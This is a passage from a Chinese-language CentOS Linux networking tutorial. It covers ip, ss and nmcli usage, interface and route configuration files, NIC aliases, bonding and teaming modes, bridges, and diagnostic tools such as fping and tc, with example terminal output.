[root@centos8 ~]#ip addr add 10.0.0.18/24 dev eth0
RTNETLINK answers: File exists
#
[root@centos8 ~]#ip addr change 10.0.0.18/24 dev eth0 preferred_lft 30 valid_lft
6
preferred_lft is greater than valid_lft
[root@centos8 ~]#ip addr change 10.0.0.18/24 dev eth0 preferred_lft 3 valid_lft
10
[root@centos8 ~]#ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group
default qlen 1000
 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
 inet 127.0.0.1/8 scope host lo
   valid_lft forever preferred_lft forever
 inet6 ::1/128 scope host
   valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP
group default qlen 1000
 link/ether 00:0c:29:8a:51:21 brd ff:ff:ff:ff:ff:ff
 inet 10.0.0.8/24 brd 10.0.0.255 scope global noprefixroute eth0
   valid_lft forever preferred_lft forever
 inet 10.0.0.18/24 scope global secondary dynamic eth0
   valid_lft 7sec preferred_lft 0sec
 inet6 fe80::20c:29ff:fe8a:5121/64 scope link
   valid_lft forever preferred_lft forever
 
 
#过10s后地址消失
[root@centos8 ~]#ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group
default qlen 1000
 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
 inet 127.0.0.1/8 scope host lo
   valid_lft forever preferred_lft forever
 inet6 ::1/128 scope host
   valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP
group default qlen 1000
 link/ether 00:0c:29:8a:51:21 brd ff:ff:ff:ff:ff:ff
 inet 10.0.0.8/24 brd 10.0.0.255 scope global noprefixroute eth0
   valid_lft forever preferred_lft forever
 inet6 fe80::20c:29ff:fe8a:5121/64 scope link
   valid_lft forever preferred_lft forever
 
[root@centos8 ~]#ip addr change 10.0.0.18/24 dev eth0 preferred_lft 10 valid_lft
20
 
 
[root@centos8 ~]#ip addr change 10.0.0.18/24 dev eth0 preferred_lft 20 valid_lft
40
[root@centos8 ~]#ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group
default qlen 1000
 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
 inet 127.0.0.1/8 scope host lo
   valid_lft forever preferred_lft forever
 inet6 ::1/128 scope host
   valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP
group default qlen 1000
 link/ether 00:0c:29:8a:51:21 brd ff:ff:ff:ff:ff:ff
 inet 10.0.0.8/24 brd 10.0.0.255 scope global noprefixroute eth0
   valid_lft forever preferred_lft forever
 inet 10.0.0.18/24 scope global secondary dynamic eth0
   valid_lft 39sec preferred_lft 19sec
 inet6 fe80::20c:29ff:fe8a:5121/64 scope link
   valid_lft forever preferred_lft forever
 
 
#replace 代替现有地址信息
[root@centos8 ~]#ip addr replace 10.0.0.18/24 dev eth0 preferred_lft 30 valid_lft
60
[root@centos8 ~]#ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group
default qlen 1000
 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
 inet 127.0.0.1/8 scope host lo
   valid_lft forever preferred_lft forever
 inet6 ::1/128 scope host
   valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP
group default qlen 1000
 link/ether 00:0c:29:8a:51:21 brd ff:ff:ff:ff:ff:ff
....
 
 
#replace 也可实现新加IP
[root@centos8 ~]#ip addr replace 10.0.0.28/24 dev eth0 preferred_lft 30 valid_lft
60
[root@centos8 ~]#ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group
default qlen 1000
 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
 inet 127.0.0.1/8 scope host lo
   valid_lft forever preferred_lft forever
 inet6 ::1/128 scope host
   valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP
group default qlen 1000
 link/ether 00:0c:29:8a:51:21 brd ff:ff:ff:ff:ff:ff
 inet 10.0.0.8/24 brd 10.0.0.255 scope global noprefixroute eth0
   valid_lft forever preferred_lft forever
 inet 10.0.0.28/24 scope global secondary dynamic eth0
....

4.3.8.2 管理路由


#ip route 用法
#添加路由：
ip route add TARGET via GW dev IFACE src SOURCE_IP
TARGET:
主机路由：IP
网络路由：NETWORK/MASK
#添加网关：
ip route add default via GW dev IFACE
#删除路由：
ip route del TARGET
#显示路由：
ip route show|list
#清空路由表：
ip route flush [dev IFACE] [via PREFIX]
 
 
#例：
ip route add 192.168.0.0/24 via 172.16.0.1
ip route add 192.168.1.100 via 172.16.0.1
ip route add default via 172.16.0.1
ip route flush dev eth0
 
 
#例: 查看路由过程
[root@centos8 ~]#ip route get 10.0.0.7
10.0.0.7 dev eth0 src 10.0.0.8 uid 0
 cache
[root@centos8 ~]#ip route get 8.8.8.8
8.8.8.8 via 10.0.0.2 dev eth0 src 10.0.0.8 uid 0
 cache

4.3.9 ss 命令

来自于iproute包，代替netstat，netstat 通过遍历 /proc来获取 socket信息，ss 使用 netlink与内核
tcp_diag 模块通信获取 socket 信息


#格式：
ss [OPTION]... [FILTER]
 
 
#常用选项：
-t: tcp协议相关
-u: udp协议相关
-w: 裸套接字相关
-x：unix sock相关
-l: listen状态的连接
-a: 所有
-n: 数字格式
-p: 相关的程序及PID
-e: 扩展的信息
-m：内存用量
-o：计时器信息
 
 
#格式说明
FILTER : [ state TCP-STATE ] [ EXPRESSION ]
TCP的常见状态：
    tcp finite state machine:
        LISTEN: 监听
        ESTABLISHED：已建立的连接
        FIN_WAIT_1
        FIN_WAIT_2
        SYN_SENT
        SYN_RECV
        CLOSED
EXPRESSION:
    dport =
    sport =
 
 
#常用组合：
-tan, -tanl, -tanlp, -uan
 
 
#例：常见用法
#显示本地打开的所有端口
ss -l
 
#显示每个进程具体打开的socket
ss -pl
 
#显示所有tcp socket
ss -t -a
 
#显示所有的UDP Socekt
ss -u -a
 
#显示所有已建立的ssh连接
ss -o state established '( dport = :ssh or sport = :ssh )'
 
#显示所有已建立的HTTP连接
ss -o state established '( dport = :http or sport = :http )'
[root@centos8 ~]#ss -no state established '( dport = :21 or sport = :21 )'
Netid        Recv-Q        Send-Q                
 Local Address:Port                  Peer Address:Port   
    
tcp         0           0                  
[::ffff:10.0.0.8]:21                 [::ffff:10.0.0.7]:46638  
      timer:(keepalive,119min,0)
 
 
#列出当前socket详细信息
[root@centos8 ~]#ss -s
Total: 228
TCP:  5 (estab 1, closed 0, orphaned 0, timewait 0)
Transport Total   IP    IPv6
RAW    0     0     0    
UDP    2     1     1    
TCP    5     3     2    
INET  7     4     3    
FRAG  0     0     0

4.3.10 网络配置工具 nmcli


#图形工具：nm-connection-editor
 
#字符配置 tui工具：
    nmtui
    nmtui-connect
    nmtui-edit
    nmtui-hostname
 
 
命令行工具：nmcli
以上工具都依赖NetworkManager服务，此服务是管理和监控网络设置的守护进程
 
#nmcli命令
#nmcli命令相关术语
#设备即网络接口
#连接是对网络接口的配置，一个网络接口可有多个连接配置，但同时只有一个连接配置生效
 
#格式：
nmcli [ OPTIONS ] OBJECT { COMMAND | help }
device - show and manage network interfaces
nmcli device help
connection - start, stop, and manage network connections
nmcli connection help
 
 
#修改IP地址等属性：
nmcli connection modify IFACE [+|-]setting.property value
setting.property: ipv4.addresses ipv4.gateway ipv4.dns1 ipv4.method manual |
auto
 
 
#修改配置文件执行生效：
nmcli con reload
nmcli con up con-name
 
 
 
#对照表：
nmcli con mod                                      ifcfg**-*** 文件
ipv4.method manual                                     BOOTPROTO=none
ipv4.method auto                                       BOOTPROTO=dhcp
ipv4.addresses 192.168.2.1/24                          IPADDR=192.168.2.1 PREFIX=24
ipv4.gateway 172.16.0.200                              GATEWAY=192.0.2.254
ipv4.dns 8.8.8.8                                       DNS0=8.8.8.8
ipv4.dns-search example.com                            DOMAIN=example.com
ipv4.ignore-auto-dns true                              PEERDNS=no
connection.autoconnect yes                             ONBOOT=yes
connection.id eth0                                     NAME=eth0
connection.interface-name eth0                         DEVICE=eth0
802-3-ethernet.mac-address . . .                       HWADDR= . . .
 
 
 
 
#常用命令集合：
#查看帮助
nmcli con add help
 
#使用nmcli配置网络
nmcli con show
 
#显示所有活动连接
nmcli con show --active
 
#显示网络连接配置
nmcli con show  "System eth0“
#显示设备状态
nmcli dev status
#显示网络接口属性
nmcli dev show eth0
#创建新连接default，IP自动通过dhcp获取
nmcli con add con-name default type Ethernet ifname eth0
#删除连接
nmcli con del default
#创建新连接static ，指定静态IP，不自动连接
nmcli con add con-name static  ifname eth0 autoconnect no type Ethernet
ipv4.addresses 172.25.X.10/24 ipv4.gateway  172.25.X.254
#启用static连接配置
nmcli con up static
#启用default连接配置
nmcli con up default
#修改连接设置
nmcli con mod “static” connection.autoconnect no
nmcli con mod “static” ipv4.dns 172.25.X.254
nmcli con mod “static”  +ipv4.dns  8.8.8.8
nmcli con mod “static”  -ipv4.dns  8.8.8.8
nmcli con mod “static” ipv4.addresses “172.16.X.10/24  172.16.X.254”
nmcli con mod “static”  +ipv4.addresses 10.10.10.10/16
#DNS设置存放在/etc/resolv.conf，PEERDNS=no 表示当IP通过dhcp自动获取时，dns仍是手动设置，
不自动获取等价于下面命令
nmcli con mod “system eth0” ipv4.ignore-auto-dns yes
nmcli con up default

4.4 网络配置文件

4.4.1 网络基本配置文件


#IP、MASK、GW、DNS相关的配置文件：
/etc/sysconfig/network-scripts/ifcfg-IFACE
 
 
#说明参考：
/usr/share/doc/initcripts-*/sysconfig.txt
 
 
#常用配置
设置                 说明
TYPE         接口类型；常见有的Ethernet, Bridge
NAME         此配置文件应用到的设备
DEVICE       设备名
HWADDR       对应的设备的MAC地址
UUID         设备的惟一标识
BOOTPROTO    激活此设备时使用的地址配置协议，常用的dhcp, static, none, bootp
IPADDR       指明IP地址
NETMASK      子网掩码,如:255.255.255.0
PREFIX       网络ID的位数, 如:24
GATEWAY      默认网关
DNS1         第一个DNS服务器地址
DNS2         第二个DNS服务器地址
DOMAIN       主机不完整时，自动搜索的域名后缀
ONBOOT       在系统引导时是否激活此设备
USERCTL      普通用户是否可控制此设备
PEERDNS      如果BOOTPROTO的值为“dhcp”，YES将允许dhcp server分配的dns服务
              器信息直接覆盖至/etc/resolv.conf文件，NO不允许修改resolv.conf
NM_CONTROLLED  NM是NetworkManager的简写，此网卡是否接受NM控制

4.4.2 配置当前主机的主机名


#CentOS 6 之前版本
/etc/sysconfig/network
HOSTNAME=
 
 
#centos7 以后版配置文件:
/etc/hostname
默认没有此文件，通过DNS反向解析获取主机名，主机名默认为：localhost.localdomain
删除文件/etc/hostname，恢复主机名localhost.localdomain

4.4.3 本地主机名数据库和IP地址的映射


#优先于使用DNS前检查
getent hosts 查看/etc/hosts 内容
/etc/hosts

4.4.4 DNS域名解析


/etc/resolv.conf
nameserver DNS_SERVER_IP1
nameserver DNS_SERVER_IP2
nameserver DNS_SERVER_IP3
search DOMAIN
 
#常见公共DNS
180.76.76.76 百度
223.5.5.5 阿里
223.6.6.6 阿里
119.29.29.29 腾讯
119.28.28.28 腾讯
114.114.114.114 电信
114.114.115.115 电信
1.2.4.8 CNNIC
210.2.4.8 CNNIC
240c::6666 CNNIC
240c::6644 CNNIC
80.80.80.80 Freenom World
80.80.81.81 Freenom World
8.8.8.8 Google
8.8.4.4 Google
1.1.1.1 Cloudflare
117.50.11.11  OneDNS
117.50.22.22  OneDNS
52.80.66.66 OneDNS
117.50.10.10 OneDNS  
52.80.52.52 OneDNS

4.4.5 修改 /etc/hosts和DNS的优先级


/etc/nsswitch.conf
hosts: files dns

4.4.6 路由相关的配置文件


#/etc/sysconfig/network-scripts/route-IFACE
 
#两种风格：
(1) TARGET via GW
如：10.0.0.0/8 via 172.16.0.1
 
(2) 每三行定义一条路由
ADDRESS#=TARGET
NETMASK#=mask
GATEWAY#=GW
 
 
#例: CentOS7 创建/etc/sysconfig/static-routes文件添加持久静态路由
#查看network脚本调用路由文件
[root@centos7 ~]#grep -A 3 "/etc/sysconfig/static-routes" /etc/init.d/network 
  if [ -f /etc/sysconfig/static-routes ]; then
    if [ -x /sbin/route ]; then
      grep "^any" /etc/sysconfig/static-routes | while read ignore args ;
do
       /sbin/route add -$args
      done
    else
#查看当前路由
 
[root@centos7 ~]#route -n
Kernel IP routing table
Destination   Gateway     Genmask     Flags Metric Ref  Use Iface
0.0.0.0     10.0.0.2     0.0.0.0     UG   100   0     0 eth0
10.0.0.0     0.0.0.0     255.255.255.0  U   100   0     0 eth0
 
#创建文件
[root@centos7 ~]#vim /etc/sysconfig/static-routes
[root@centos7 ~]#cat /etc/sysconfig/static-routes
any net 192.168.1.0/24 gw 10.0.0.254
any net 192.168.2.0/24 gw 10.0.0.254
[root@centos7 ~]#systemctl restart network
 
#确认路由生效
[root@centos7 ~]#route -n
Kernel IP routing table
Destination   Gateway     Genmask     Flags Metric Ref  Use Iface
0.0.0.0     10.0.0.2     0.0.0.0     UG   100   0     0 eth0
10.0.0.0     0.0.0.0     255.255.255.0  U   100   0     0 eth0
192.168.1.0   10.0.0.254    255.255.255.0  UG   0    0     0 eth0
192.168.2.0   10.0.0.254    255.255.255.0  UG   0    0     0 eth0

4.5 网卡别名

将多个IP地址绑定到一个NIC上
每个IP绑定到独立逻辑网卡，即网络别名，命名格式： ethX:Y，如：eth0:1 、eth0:2、eth0:3


#例：ifconfig 命令
ifconfig eth0:0 192.168.1.100/24 up
ifconfig eth0:0 down
 
 
#例：ip 命令
ip addr add 172.16.1.1/16 dev eth0
ip addr add 172.16.1.2/16 dev eth0 label eth0:0
ip addr del 172.16.1.2/16 dev eth0 label eth0:0
ip addr flush dev eth0 label eth0:0
 
 
#为每个设备别名生成独立的接口配置文件，格式为：ifcfg-ethX:xxx
#例： 给 lo 网卡加别名(此方式不适用于CentOS8)
[root@centos7 network-scripts]#pwd
/etc/sysconfig/network-scripts
[root@centos7 network-scripts]#cat ifcfg-lo:1
DEVICE=lo:1
IPADDR=137.0.0.1
NETMASK=255.0.0.0
NETWORK=137.0.0.0
# If you're having problems with gated making 127.0.0.0/8 a martian,
# you can change this to something else (255.255.255.255, for example)
BROADCAST=137.255.255.255
ONBOOT=yes
NAME=loopback1
[root@centos7 network-scripts]#ip addr show lo
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group
default qlen 1000
 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
 inet 127.0.0.1/8 scope host lo
   valid_lft forever preferred_lft forever
 inet 137.0.0.1/8 brd 137.255.255.255 scope global lo:1
   valid_lft forever preferred_lft forever
 inet6 ::1/128 scope host
   valid_lft forever preferred_lft forever
 
 
#例：
[root@centos8 ~]#cat /etc/sysconfig/network-scripts/ifcfg-eth0:1
DEVICE=eth0:1
IPADDR=10.0.0.100
PREFIX=8
[root@centos8 ~]#ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
   inet 10.0.0.8 netmask 255.255.255.0 broadcast 10.0.0.255
   inet6 fe80::20c:29ff:fe09:f5b prefixlen 64 scopeid 0x20<link>
   ether 00:0c:29:09:0f:5b txqueuelen 1000 (Ethernet)
   RX packets 2320 bytes 200266 (195.5 KiB)
   RX errors 0 dropped 0 overruns 0 frame 0
   TX packets 1891 bytes 279736 (273.1 KiB)
   TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
eth0:1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
   inet 10.0.0.100 netmask 255.0.0.0 broadcast 10.255.255.255
   ether 00:0c:29:09:0f:5b txqueuelen 1000 (Ethernet)
 
 
#注意：
建议 CentOS 6 关闭 NetworkManager 服务
网卡别名必须使用静态地址

4.6 多网卡 bonding

将多块网卡绑定同一IP地址对外提供服务，可以实现高可用或者负载均衡。直接给两块网卡设置同一IP地址是不可以的。通过 bonding，虚拟一块网卡对外提供连接，物理网卡的被修改为相同的MAC地址

4.6.1 Bonding 聚合链路工作模式

bond聚合链路模式共7种模式：0-6 Mode

mod=0 ，即：(balance-rr) Round-robin policy（轮询）聚合口数据报文按包轮询从物理接口转
发。

负载均衡—所有链路处于负载均衡状态，轮询方式往每条链路发送报文这模式的特点增加了带宽，
同时支持容错能力，当有链路出问题，会把流量切换到正常的链路上。
性能问题—一个连接或者会话的数据包如果从不同的接口发出的话，中途再经过不同的链路，在客
户端很有可能会出现数据包无序到达的问题，而无序到达的数据包需要重新要求被发送，这样网络
的吞吐量就会下降。Bond0在大压力的网络传输下，性能增长的并不是很理想。
需要交换机进行端口绑定

mod=1，即： (active-backup) Active-backup policy（主-备份策略）只有Active状态的物理接口
才转发数据报文。
容错能力—只有一个slave是激活的(active)。也就是说同一时刻只有一个网卡处于工作状态，其他
的slave都处于备份状态，只有在当前激活的slave故障后才有可能会变为激活的(active)。
无负载均衡—此算法的优点是可以提供高网络连接的可用性，但是它的资源利用率较低，只有一个
接口处于工作状态，在有 N 个网络接口的情况下，资源利用率为1/N。

mod=2，即：(balance-xor) XOR policy（平衡策略）聚合口数据报文按源目MAC、源目IP、源目
端口进行异或HASH运算得到一个值，根据该值查找接口转发数据报文
负载均衡—基于指定的传输HASH策略传输数据包。
容错能力—这模式的特点增加了带宽，同时支持容错能力，当有链路出问题，会把流量切换到正常
的链路上。
性能问题—该模式将限定流量，以保证到达特定对端的流量总是从同一个接口上发出。既然目的地
是通过MAC地址来决定的，因此该模式在“本地”网络配置下可以工作得很好。如果所有流量是通过
单个路由器，由于只有一个网关，源和目标mac都固定了，那么这个算法算出的线路就一直是同一
条，那么这种模式就没有多少意义了。
需要交换机配置为port channel

mod=3，即：broadcast（广播策略）这种模式的特点是一个报文会复制两份往bond下的两个接
口分别发送出去，
当有对端交换机失效，感觉不到任何downtime，但此法过于浪费资源；不过这种模式有很好的容
错机制。此模式适用于金融行业，因为他们需要高可靠性的网络，不允许出现任何问题。

mod=4，即：(802.3ad) IEEE 802.3ad Dynamic link aggregation（IEEE 802.3ad 动态链接聚合）
在动态聚合模式下，聚合组内的成员端口上均启用LACP（链路汇聚控制协议）协议，其端口状态
通过该协议自动进行维护。
负载均衡—基于指定的传输HASH策略传输数据包。默认算法与blance-xor一样。
容错能力—这模式的特点增加了带宽，同时支持容错能力，当有链路出问题，会把流量切换到正常
的链路上。对比blance-xor，这种模式定期发送LACPDU报文维护链路聚合状态，保证链路质量。
需要交换机支持LACP协议.

mod=5，即：(balance-tlb) Adaptive transmit load balancing（适配器传输负载均衡）
在每个物理接口上根据当前的负载（根据速度计算）分配外出流量。如果正在接收数据的物理接口
口出故障了，另一个物理接口接管该故障物理口的MAC地址。
需要ethtool支持获取每个slave的速率

mod=6，即：(balance-alb) Adaptive load balancing（适配器适应性负载均衡）

该模式包含了balance-tlb模式，同时加上针对IPV4流量的接收负载均衡，而且不需要任何
switch(交换机)的支持。接收负载均衡是通过ARP协商实现的。bonding驱动截获本机发送的ARP应
答，并把源硬件地址改写为bond中某个物理接口的唯一硬件地址，从而使得不同的对端使用不同
的硬件地址进行通信。
mod=6与mod=0的区别：mod=6，先把eth0流量占满，再占eth1，….ethX；而mod=0的话，会
发现2个口的流量都很稳定，基本一样的带宽。而mod=6，会发现第一个口流量很高，第2个口只
占了小部分流量


常用的模式为 0,1,3,6
mode 1、5、6 不需要交换机设置
mode 0、2、3、4需要交换机设置
active-backup、balance-tlb 和 balance-alb 模式不需要交换机的任何特殊配置。其他绑定模式需
要配置交换机以便整合链接。如：Cisco 交换机需要在模式 0、2 和 3 中使用 EtherChannel，但在模式
4中需要 LACP和 EtherChannel

4.6.2 Bonding 配置


#参考：
/usr/share/doc/kernel-doc-version/Documentation/networking/bonding.txt
https://www.kernel.org/doc/Documentation/networking/bonding.txt
 
 
#创建bonding设备的配置文件
/etc/sysconfig/network-scripts/ifcfg-bond0
NAME=bond0
TYPE=bond
DEVICE=bond0
BOOTPROTO=none
IPADDR=10.0.0.100
PREFIX=8
#miimon指定链路监测时间间隔。如果miimon=100，那么系统每100ms 监测一次链路连接状态，如果有一
条线路不通就转入另一条线路
BONDING_OPTS="mode=1 miimon=100 fail_over_mac=1"
 
/etc/sysconfig/network-scripts/ifcfg-eth0
NAME=eth0
DEVICE=eth0
BOOTPROTO=none
MASTER=bond0
SLAVE=yes
ONBOOT=yes
 
 
/etc/sysconfig/network-scripts/ifcfg-eth1
NAME=eth1
DEVICE=eth1
BOOTPROTO=none
MASTER=bond0
SLAVE=yes
ONBOOT=yes
 
 
#查看bond0状态：
/proc/net/bonding/bond0
 
 
#删除bond0
ifconfig bond0 down
rmmod bonding

4.6.3 nmcli实现 bonding


#添加bonding接口
nmcli con add type bond con-name mybond0 ifname bond0 mode active-backup
ipv4.method manual ipv4.addresses 10.0.0.100/24
 
#添加从属接口
nmcli con add type bond-slave ifname ens7 master bond0
nmcli con add type bond-slave ifname ens3 master bond0
 
#注：如无为从属接口提供连接名，则该名称是接口名称加类型构成
 
#要启动绑定，则必须首先启动从属接口
nmcli con up bond-slave-eth0
nmcli con up bond-slave-eth1
 
#启动绑定
nmcli con up mybond0

4.7 网络组 Network Teaming

网络组：是将多个网卡聚合在一起方法，从而实现冗错和提高吞吐量
网络组不同于旧版中bonding技术，提供更好的性能和扩展性
网络组由内核驱动和teamd守护进程实现

多种方式 runner
        broadcast
        roundrobin
        activebackup
        loadbalance
        lacp (implements the 802.3ad Link Aggregation Control Protocol)

网络组特点
        启动网络组接口不会自动启动网络组中的port接口
        启动网络组接口中的port接口总会自动启动网络组接口
        禁用网络组接口会自动禁用网络组中的port接口
        没有port接口的网络组接口可以启动静态IP连接
        启用DHCP连接时，没有port接口的网络组会等待port接口的加入


#创建网络组接口
nmcli con add type team con-name CNAME ifname INAME [config JSON]
 
CNAME 连接名
INAME 接口名
 
JSON 指定runner方式,格式：'{"runner": {"name": "METHOD"}}'
METHOD 可以是broadcast, roundrobin, activebackup, loadbalance, lacp
 
 
#创建port接口
nmcli con add type team-slave con-name CNAME ifname INAME master TEAM
 
CNAME     连接名,连接名若不指定，默认为team-slave-IFACE
INAME     网络接口名
TEAM     网络组接口名
 
##断开和启动
nmcli dev dis INAME
nmcli con up CNAME
 
INAME 设备名 CNAME 网络组接口名或port接口
 
 
 
#网络组示例
nmcli con add type team con-name myteam0 ifname team0 config '{"runner": {"name":
"loadbalance"}}' ipv4.addresses 192.168.1.100/24 ipv4.method manual
nmcli con add con-name team0-eth1 type team-slave ifname eth1 master team0
nmcli con add con-name team0-eth2 type team-slave ifname eth2 master team0
nmcli con up myteam0
nmcli con up team0-eth1
nmcli con up team0-eth2
 
 
teamdctl team0 state
ping -I team0 192.168.0.254
nmcli dev dis eth1
teamdctl team0 state
nmcli con up team0-port1
nmcli dev dis eth2
teamdctl team0 state
nmcli con up team0-port2
teamdctl team0 state
 
 
 
#管理网络组配置文件
/etc/sysconfig/network-scripts/ifcfg-team0
DEVICE=team0
DEVICETYPE=Team
TEAM_CONFIG="{\"runner\": {\"name\": \"broadcast\"}}"
BOOTPROTO=none
IPADDR0=172.16.0.100
PREFIX0=24
NAME=team0
ONBOOT=yes
 
#管理网络组配置文件
/etc/sysconfig/network-scripts/ifcfg-team0-eth1
DEVICE=eth1
DEVICETYPE=TeamPort
TEAM_MASTER=team0
NAME=team0-eth1
ONBOOT=yes
 
 
#删除网络组
nmcli connection down team0
teamdctl team0 state
nmcli connection show
nmcli connectioni delete team0-eth0
nmcli connectioni delete team0-eth1
nmcli connection show

4.8 网桥(交换机)

4.8.1 桥接原理

桥接：把一台机器上的若干个网络接口“连接”起来。其结果是，其中一个网口收到的报文会被复制给其他网口并发送出去。以使得网口之间的报文能够互相转发。网桥就是这样一个设备，它有若干个网口，并且这些网口是桥接起来的。与网桥相连的主机就能通过交换机的报文转发而互相通信。

主机A发送的报文被送到交换机S1的eth0口，由于eth0与eth1、eth2桥接在一起，故而报文被复制到eth1和eth2，并且发送出去，然后被主机B和交换机S2接收到。而S2又会将报文转发给主机C、D


#CentOS 8 取消brctl 工具,可以用下面方法查看网桥
 
#查看桥接情况
[root@centos8 ~]#ip link show master virbr0
4: virbr0-nic: <BROADCAST,MULTICAST> mtu 1500 qdisc fq_codel master virbr0 state
DOWN mode DEFAULT group default qlen 1000
 link/ether 52:54:00:52:f2:5c brd ff:ff:ff:ff:ff:ff
。。。。
 
[root@centos8 ~]#bridge link show
4: virbr0-nic: <BROADCAST,MULTICAST> mtu 1500 master virbr0 state disabled
priority 32 cost 100
8: vnet0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 master virbr0 state
forwarding priority 32 cost 100
9: vnet1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 master virbr0 state
forwarding priority 32 cost 100

4.8.2 配置实现网桥

工具包：bridge-utils,目前 CentOS 8 系统光盘里无此包,EPEL源有此包


yum install bridge-utils
 
#查看网桥
brctl show
 
#查看CAM(content addressable memory内容可寻址存储器)表
brctl showmacs br0
 
#添加和删除网桥
brctl addbr | delbr br0
 
#添加和删除网桥中网卡
brctl addif | delif br0 eth0
 
#默认br0 是down,必须启用
ifconfig br0 up
 
#启用STP
[root@centos7 ~]#brctl show
bridge name bridge id STP enabled interfaces
br0 8000.000c297e67a3 no eth1
eth2
[root@centos7 ~]#brctl stp br0 on
[root@centos7 ~]#brctl show
bridge name bridge id STP enabled interfaces
br0 8000.000c297e67a3 yes eth1
 
 
#注意：NetworkManager只支持以太网接口连接到网桥，不支持聚合接口
 
 
 
#nmcli命令创建软件网桥
nmcli con add con-name mybr0 type bridge ifname br0
nmcli con modify mybr0 ipv4.addresses 10.0.0.100/24 ipv4.method manual
nmcli con add con-name br0-port0 type bridge-slave ifname eth0 master br0
 
 
#查看配置文件
cat /etc/sysconfig/network-scripts/ifcfg-br0
cat /etc/sysconfig/network-scripts/ifcfg-br0-port0
 
 
#例：nmcli实现网桥
 
#1创建网桥
nmcli con add type bridge con-name br0 ifname br0
nmcli connection modify br0 ipv4.addresses 10.0.0.100/24 ipv4.method manual
nmcli con up br0
 
#2加入物理网卡
nmcli con add type bridge-slave con-name br0-port0 ifname eth0 master br0
nmcli con add type bridge-slave con-name br0-port1 ifname eth1 master br0
nmcli con up br0-port0
nmcli con up br0-port1
 
#3查看网桥配置文件
cat /etc/sysconfig/network-scripts/ifcfg-br0
DEVICE=br0
STP=yes
TYPE=Bridge
BOOTPROTO=static
IPADDR=10.0.0.100
PREFIX=24
 
cat /etc/sysconfig/network-scripts/ifcfg-br0-port0
TYPE=Ethernet
NAME=br0-port0
DEVICE=eth0
ONBOOT=yes
BRIDGE=br0
UUID=23f41d3b-b57c-4e26-9b17-d5f02dafd12d
 
#4安装管理软件包：
yum install bridge-utils
brctl show
 
#5删除br0
nmcli con down br0
rm /etc/sysconfig/network-scripts/ifcfg-br0*
nmcli con reload

4.9 网络测试诊断工具


#测试网络连通性
ping
 
#显示正确的路由表
ip route
route
 
#跟踪路由
traceroute
tracepath
mtr
 
#确定名称服务器使用
nslookup
host
dig
 
#抓包工具
tcpdump
wireshark
 
#安全扫描工具
nmap
netcat ：网络界的瑞士军刀，即nc
 
#流量控制工具
tc
 
#例：
tc qdisc add dev eth0 root netem loss 50%
tc qdisc add dev eth0 root netem delay 1000ms
tc qdisc show dev eth0
tc qdisc del

4.9.1 fping

fping是一个程序，用于将ICMP探测发送到网络主机，类似于ping，fping的历史由来已久：Roland
Schemers在1992年确实发布了它的第一个版本，从那时起它就确立了自己的地位，成为网络诊断和统计的标准工具

相对于ping多个主机时性能要高得多。 fping完全不同于ping，可以在命令行上定义任意数量的主机，或者指定包含要ping的IP地址或主机列表的文件, 常在shell 脚本中使用

CentOS 中由EPEL源提供

官网：http://www.fping.org/


[root@centos8 ~]#yum -y install fping
 
[root@centos8 ~]#fping 10.0.0.7
10.0.0.7 is alive
 
[root@centos7 ~]#echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all
[root@centos8 ~]#fping 10.0.0.7
10.0.0.7 is unreachable
 
[root@centos8 ~]#fping 10.0.0.7
10.0.0.7 is unreachable
[root@centos8 ~]#fping 10.0.0.7 10.0.0.8
10.0.0.8 is alive
10.0.0.7 is unreachable
 
#-g　选项可以指定网段或地址范围
[root@centos8 ~]#fping -g 10.0.0.0/24
10.0.0.1 is alive
10.0.0.2 is alive
10.0.0.8 is alive
10.0.0.100 is alive
ICMP Host Unreachable from 10.0.0.8 for ICMP Echo sent to 10.0.0.3
ICMP Host Unreachable from 10.0.0.8 for ICMP Echo sent to 10.0.0.3
ICMP Host Unreachable from 10.0.0.8 for ICMP Echo sent to 10.0.0.6
ICMP Host Unreachable from 10.0.0.8 for ICMP Echo sent to 10.0.0.6
......
[root@centos8 ~]#fping -g 10.0.0.5 10.0.0.10
10.0.0.8 is alive
ICMP Host Unreachable from 10.0.0.8 for ICMP Echo sent to 10.0.0.6
ICMP Host Unreachable from 10.0.0.8 for ICMP Echo sent to 10.0.0.6
ICMP Host Unreachable from 10.0.0.8 for ICMP Echo sent to 10.0.0.6
ICMP Host Unreachable from 10.0.0.8 for ICMP Echo sent to 10.0.0.6
ICMP Host Unreachable from 10.0.0.8 for ICMP Echo sent to 10.0.0.5
ICMP Host Unreachable from 10.0.0.8 for ICMP Echo sent to 10.0.0.5
ICMP Host Unreachable from 10.0.0.8 for ICMP Echo sent to 10.0.0.5
